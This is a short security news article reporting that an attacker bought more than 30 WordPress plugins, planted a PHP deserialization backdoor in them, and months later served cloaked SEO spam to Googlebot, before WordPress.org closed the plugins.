Someone Bought 30+ WordPress Plugins and Planted Backdoors
April 15, 2026 - 2:14 pm
An attacker purchased 30+ WordPress plugins (Essential Plugin portfolio) on Flippa for a six-figure sum in August 2025, secretly injecting a PHP deserialization backdoor into each one. Eight months later, in April 2026, the attacker activated the payload, serving cloaked SEO spam exclusively to Googlebot while website owners remained unaware.
WordPress.org shut down the plugins on April 7th, 2026, permanently closing every plugin from the Essential Plugin author. This attack, one of the most sophisticated supply chain compromises the platform has faced, exploited a critical structural gap: WordPress lacks mechanisms for reviewing plugin ownership transfers or requiring code signing for updates.
The buyer, identified as "Kris" with a background in SEO, cryptocurrency, and online gambling marketing, acquired the plugins through Flippa, a marketplace for digital businesses. Flippa even published a case study about the sale in July 2025, unaware of the hidden backdoor.
Eight months passed without incident, allowing the malicious code to gain trust. The payload activated on April 5th and 6th, 2026, during a six-hour and 44-minute window (04:22 - 11:06 UTC), distributing spam through a command-and-control domain (analytics.essentialplugin.com) to websites running the compromised plugins.
The payload's sophistication lay in its restraint, serving malicious content only to Googlebot while keeping website owners completely unaware. It utilized an Ethereum smart contract for C2 infrastructure, making it resistant to traditional takedowns.